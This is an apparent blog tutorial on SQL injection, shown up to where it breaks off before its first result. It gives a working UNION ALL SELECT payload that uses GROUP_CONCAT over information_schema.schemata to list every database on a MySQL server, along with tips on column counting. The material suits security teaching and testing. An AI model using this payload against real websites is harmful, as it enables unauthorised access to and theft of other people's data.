Hey there! Back again with another article about SQL Injection techniques.

So, I’ve been seeing a lot of beginners in SQL Injection. While they try to extract data from the database, they ignore the fact that they can do better.

Note that I don’t have any bad intention to destroy any website or any organization. This post is only for educational purposes.

The problem:

The problem with beginners is, they extract data only from the current database in which the vulnerable query is getting executed. They don’t even try to access other databases and their content. So, a lot of intermediate and advanced SQL injectors might be aware of the fact that if the query is executed with proper privileges, the attacker can access other databases on that SQL server.

So, let’s actually take a look at how it’s actually done.

The Solution:

LeT’s SQL iNjEcT!!!

Step 1:

Well, the first part of exploitation sequence is to extract the names of databases present on the server. This can be done quite easily actually using group concatenation and union select.

Quick Tip: UNION ALL SELECT can be used instead of UNION SELECT while SQL injection to union two results without performing DISTINCT operation; i.e. It doesn’t remove the duplicates.

So, let’s extract database names on the server.

Query: ?param=’ AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(schema_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.schemata)a),3,4,5,6,7,8,9 -- -

Explanation:

There are 9 columns in the table of the original query. You can find it out using the ORDER BY technique. So, I wrote UNION ALL select 1,2,3,4,5,6,7,8,9 and extracted data at position 2 and replaced it by own nested SELECT query.

GROUP_CONCAT() function is used to concatenate all the rows of the returned result. Here I used nested select. In the inner SELECT statement, I selected all the rows in the information_schema.schemata table.

information_schema.schemata is a table in which all the names and other information of the databases present on that server are stored.

I performed an explicit type cast on the GROUP_CONCAT() result to increase the result buffer size to store and show more result. You can use LIMIT m,n in MySQL and some other servers to return rows within a range of m and n.

Result 1: